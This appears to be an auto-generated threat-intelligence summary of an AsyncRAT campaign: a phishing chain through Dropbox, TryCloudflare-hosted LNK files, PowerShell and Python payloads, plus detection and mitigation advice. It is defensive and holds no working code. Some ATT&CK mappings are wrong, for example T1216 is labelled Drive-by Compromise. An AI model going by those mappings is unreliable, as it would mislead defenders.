Full Report
A malware campaign has been observed delivering a remote access trojan (RAT) named AsyncRAT by making use of Python payloads and TryCloudflare tunnels. "AsyncRAT is a remote access trojan (RAT) that exploits the async/await pattern for efficient, asynchronous communication," Forcepoint X-Labs researcher Jyotika Singh said in an analysis. "It allows attackers to control infected systems
Analysis Summary
# Tool/Technique: AsyncRAT
## Overview
AsyncRAT is a Remote Access Trojan (RAT) that utilizes the `async/await` pattern for efficient, asynchronous communication with its command and control (C2) infrastructure. It is designed for stealthy remote system control, data exfiltration, and command execution.
## Technical Details
- Type: Malware family (RAT)
- Platform: Windows (implied by PowerShell/LNK file execution chain)
- Capabilities: Remote control, data exfiltration, command execution, stealthy operation.
- First Seen: Not explicitly stated, but variations have been seen recently, including last year.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on the description of a RAT and its delivery chain.*
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- T1560 - Archive Collected Data
- T1560.001 - Archive via Utility
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- Establishing asynchronous, efficient remote communication with C2.
- Allowing attackers to control infected systems.
- Executing arbitrary commands provided by the operator.
### Advanced Features
- Designed for stealthy operation to remain hidden during command execution and data theft.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Python payload(s) containing AsyncRAT components]
- Registry Keys: [Not provided in the context]
- Network Indicators: [C2 communication channels utilizing asynchronous patterns]
- Behavioral Indicators: Creation and execution of LNK files leading to PowerShell execution; download chains utilizing legitimate services like TryCloudflare and Dropbox.
## Associated Threat Actors
- Threat actors leveraging phishing campaigns and legitimate infrastructure abuse (Dropbox, TryCloudflare).
## Detection Methods
- Signature-based detection for known AsyncRAT binaries.
- Behavioral detection flagging LNK file execution leading to PowerShell scripts.
- Network monitoring looking for connections to Cloudflare subdomains used for C2 once the payload is deployed.
## Mitigation Strategies
- Implement robust email filtering to block phishing attempts originating from untrusted sources or links pointing to URL shortening/file hosting services (Dropbox).
- Disable the execution of suspicious file types, especially URL/Internet shortcuts (URL/LNK files), from untrusted sources.
- Application whitelisting to restrict unauthorized script execution (PowerShell).
- Monitor for unusual outbound network connections originating from typical user application processes.
## Related Tools/Techniques
- **Malware Families:** Venom RAT, XWorm, GuLoader, PureLogs Stealer, Remcos RAT, SapphireRAT, MetaStealer, Sliver implant.
- **Techniques/Infrastructure Used:** Phishing via email, use of legitimate services (Dropbox, TryCloudflare, Cloudflare Workers) for payload staging and delivery.
***
# Tool/Technique: TryCloudflare Tunnels
## Overview
TryCloudflare tunnels, part of Cloudflare Zero Trust, are a legitimate service used to expose local web servers to the internet securely via a dedicated, ephemeral subdomain on `trycloudflare[.]com`, without opening firewall ports. Attackers are abusing this service to host infection stages temporarily.
## Technical Details
- Type: Legitimate Infrastructure abused as a Service/Technique
- Platform: Network/Web Infrastructure
- Capabilities: Proxying traffic from a public-facing `trycloudflare[.]com` subdomain to a private server endpoint.
- First Seen: N/A (Legitimate service, abuse observed recently)
## MITRE ATT&CK Mapping
- T1105 - Ingress Tool Transfer (Used to fetch the next stage payload: LNK file)
- T1071 - Application Layer Protocol
## Functionality
### Core Capabilities
- Creating a dedicated, proxied channel (subdomain) to the attacker's host without standard port opening.
### Advanced Features
- Used in this context to host the malicious LNK file, adding a layer of perceived legitimacy by using a known Cloudflare service.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [LNK file retrieved via a TryCloudflare URL]
- Registry Keys: [Not applicable]
- Network Indicators: Connections to attacker-controlled subdomains on `trycloudflare[.]com`.
- Behavioral Indicators: PowerShell fetching content from a TryCloudflare URL.
## Associated Threat Actors
- Threat actors utilizing multi-stage infection chains involving the abuse of legitimate cloud services.
## Detection Methods
- Network DLP/Firewall rules flagging traffic to the `trycloudflare[.]com` domain, especially when associated with initial access payloads (e.g., PowerShell downloads).
- Monitoring for the retrieval of LNK files or scripts from temporary cloud service endpoints.
## Mitigation Strategies
- Implement strict egress filtering to minimize connections to known temporary file hosting or tunneling services, if possible.
- Enhance user training to be suspicious of attachments leading to LNK files, even if the initiating URL appears reputable.
- Monitor PowerShell execution for download cradle capabilities initiated from unusual network sources.
## Related Tools/Techniques
- Cloudflare Workers (also mentioned as being abused for credential harvesting).
- Use of legitimate cloud storage (Dropbox) for initial file staging.
***
# Technique: Multi-Stage Infection Chain via Phishing (LNK/URL abuse)
## Overview
This technique involves a multi-stage infection sequence starting with a phishing email that directs the user to a Dropbox URL. This leads to the download of a ZIP containing a URL file, which pulls the next stage (a LNK shortcut) from a TryCloudflare tunnel. This LNK file executes PowerShell, leading to further script downloads (BAT) and finally launching the malware payload(s).
## Technical Details
- Type: Technique
- Platform: Windows (due to LNK/PowerShell usage)
- Capabilities: Evasion of security controls through multiple stages, utilization of legitimate infrastructure for hosting, and distraction via decoy documents.
- First Seen: The specific orchestration variant is recent, though multi-stage attacks are common.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Initial contact method)
- T1204 - User Execution
- T1204.002 - Malicious File
- T1216 - Drive-by Compromise (via dropped shortcuts)
- T1036 - Masquerading (Decoy PDF displayed)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
## Functionality
### Core Capabilities
- Initial infection via social engineering (phishing email).
- Staging payloads using trusted infrastructure (Dropbox URLs).
- Sequential execution of file types: ZIP $\rightarrow$ URL file $\rightarrow$ LNK file.
- Utilizing the LNK file to launch PowerShell for subsequent downloads.
### Advanced Features
- Displaying a benign decoy PDF document to the recipient to mask system activity.
- Leveraging legitimate tunneling services (TryCloudflare) to host the critical LNK file.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: ZIP archive, Internet Shortcut (.URL file), Windows Shortcut (.LNK file), Decoy PDF, Batch script (.BAT file), Python payload.
- Registry Keys: [Not provided in the context]
- Network Indicators: Dropbox URLs, `trycloudflare[.]com` subdomains.
- Behavioral Indicators: Execution chain involving LNK $\rightarrow$ PowerShell $\rightarrow$ download of ZIP/script.
## Associated Threat Actors
- Threat actors employing sophisticated multi-stage delivery mechanisms.
## Detection Methods
- Monitoring for the execution sequence: URL/LNK file execution $\rightarrow$ PowerShell launch.
- Analyzing the structure of downloaded archives for unusual combinations (e.g., URL file alongside LNK file).
- Detecting scripts originating from network connections to Dropbox or Cloudflare services that initiate further file downloads.
## Mitigation Strategies
- Educate users to be highly suspicious of shortcut (.LNK) files downloaded from emails, regardless of the originating source.
- Use EDR solutions configured to monitor and block suspicious PowerShell command-line arguments, especially those involving downloading content from the internet.
- Implement controls to prevent the execution of LNK files or scripts originating from temporary download locations.
## Related Tools/Techniques
- Phishing-as-a-Service (PhaaS) toolkits (mentioned in context).
- Abuse of Cloudflare Workers.
- Techniques distributing malware via government/official domain spoofing.